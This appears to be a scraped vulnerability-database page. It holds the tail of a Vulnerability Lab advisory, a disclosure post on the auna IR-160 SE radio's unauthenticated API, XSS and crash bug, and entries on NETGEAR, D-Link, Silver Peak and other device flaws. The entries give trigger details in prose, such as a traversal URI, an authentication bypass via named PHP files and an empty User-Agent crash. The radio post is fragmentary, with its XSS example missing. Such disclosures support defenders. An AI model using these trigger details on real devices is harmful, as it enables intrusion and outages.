remote attackers for spreading randomware / malware,
mass defacements, compromises for further linux network attacks or being
part of a criminal acting iot botnet.
Credits & Authors:
==================
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
. The internet radio device auna IR-160 SE has multiple vulnerabilities.
It uses the firmware UIProto, different versions of which can also be
found in many other radios. The firmware offers a rudimentary web API that can be reached on the
local network on port 80. This API is completely unauthenticated,
allowing anyone to control the radio over the local network. (already
known as CVE-2019-13474, but relevant for the other two findings) [1]
[2] [3]
2. The web UI does not encode user input, resulting in a XSS
vulnerability, e.g. The firmware crashes when sending a device name longer than 84
characters. Some parts of the firmware will recover afterwards and music
will play again after a few seconds, but the service on port 80 remains
borked until the radio is reset using the switch on the back. This may
or may not be a memory corruption vulnerability. I don't feel like
analyzing this any further, but it certainly looks kinda fucked. These reports also mention
other devices that are possibly affected by this as well.
Also, if anyone knows how to re-enable telnetd on the patched version of
UIProto, please let me know!
Love,
naphthalin
[1] https://github.com/kayrus/iradio
[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio
[3]
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution
| VAR-201909-0107 | CVE-2019-5055 | NETGEAR N300 In wireless router NULL Pointer dereference vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability. The NETGEAR N300 is a wireless router from NETGEAR. Hostapd is a user space daemon for access points and authentication servers
| VAR-201909-1543 | No CVE | Schneider Electric Modicon M340 PLC Module Has Denial of Service Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Schneider Electric M340 PLC is a modular universal controller for the manufacturing industry from Schneider. Is widely used in tobacco, petrochemical, water and other important industrial control sites. Zh
Schneider Electric M340 PLC CPU has a denial of service vulnerability. Allows attackers to exploit vulnerabilities and quickly send a large number of specific data packets to any port of the host, rendering the host unresponsive and causing a denial of service attack
| VAR-201909-1557 | No CVE | ABB Pluto Manager has dll hijacking vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
The ABB Group is a global leader in power and automation technology, dedicated to providing solutions to customers in the industrial and power industries.
ABB Pluto Manager has a dll hijacking vulnerability. Attackers can use the vulnerability to load malicious dlls and execute malicious code
| VAR-201909-0587 | CVE-2019-16190 | plural D-Link Authentication vulnerabilities in product devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php. D-Link DIR-868L REVB , DIR-885L REVA , DIR-895L REVA Devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-868L REVB and so on are all wireless routers from Taiwan D-Link.
There are security vulnerabilities in SharePort Web Access in D-Link DIR-868L REVB 2.03 and earlier, DIR-885L REVA 1.20 and earlier, and DIR-895L REVA 1.21 and earlier. An attacker could use this vulnerability to bypass authentication
| VAR-201909-0106 | CVE-2019-5054 | NETGEAR N300 HTTP On the server NULL Pointer dereference vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability. NETGEAR N300 is a wireless router of NETGEAR
| VAR-201909-0608 | CVE-2019-16099 | Silver Peak EdgeConnect SD-WAN Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows CSRF via JSON data to a .swf file. Silver Peak EdgeConnect SD-WAN Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
| VAR-201909-0610 | CVE-2019-16101 | Silver Peak EdgeConnect SD-WAN Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows remote attackers to obtain potentially sensitive stack traces by sending incorrect JSON data to the REST API, such as the rest/json/banners URI. Silver Peak EdgeConnect SD-WAN Contains an information disclosure vulnerability.Information may be obtained. The platform mainly provides functions such as path conditioning, application classification, routing and virtual WAN overlay
| VAR-201909-0532 | CVE-2019-16105 | Silver Peak EdgeConnect SD-WAN Path traversal vulnerability |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows ..%2f directory traversal via a rest/json/configdb/download/ URI. The platform mainly provides functions such as path conditioning, application classification, routing and virtual WAN overlay. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths. An attacker could exploit this vulnerability to access locations outside of restricted directories
| VAR-201909-0613 | CVE-2019-16104 | Silver Peak EdgeConnect SD-WAN Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x has reflected XSS via the rest/json/configdb/download/ PATH_INFO. Silver Peak EdgeConnect SD-WAN Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The platform mainly provides functions such as path conditioning, application classification, routing and virtual WAN overlay. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code
| VAR-201909-0612 | CVE-2019-16103 | Silver Peak EdgeConnect SD-WAN Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows privilege escalation (by administrators) from the menu to a root Bash OS shell via the spsshell feature. Silver Peak EdgeConnect SD-WAN Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Silver Peak Systems EdgeConnect SD-WAN is a software-defined generalized network platform from Silver Peak Systems in the United States. The platform mainly provides functions such as path conditioning, application classification, routing and virtual WAN overlay. A security vulnerability exists in Silver Peak Systems EdgeConnect SD-WAN prior to 8.1.7.x. An attacker could exploit this vulnerability to elevate privileges
| VAR-201909-0611 | CVE-2019-16102 | Silver Peak EdgeConnect SD-WAN Input validation vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x has an SNMP service with a public value for rocommunity and trapcommunity. Silver Peak EdgeConnect SD-WAN Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The platform mainly provides functions such as path conditioning, application classification, routing and virtual WAN overlay. The vulnerability stems from the failure of the network system or product to properly validate the input data
| VAR-201909-0609 | CVE-2019-16100 | Silver Peak EdgeConnect SD-WAN Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Silver Peak EdgeConnect SD-WAN before 8.1.7.x allows remote attackers to trigger a web-interface outage via slow client-side HTTP traffic from a single source. Silver Peak EdgeConnect SD-WAN Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state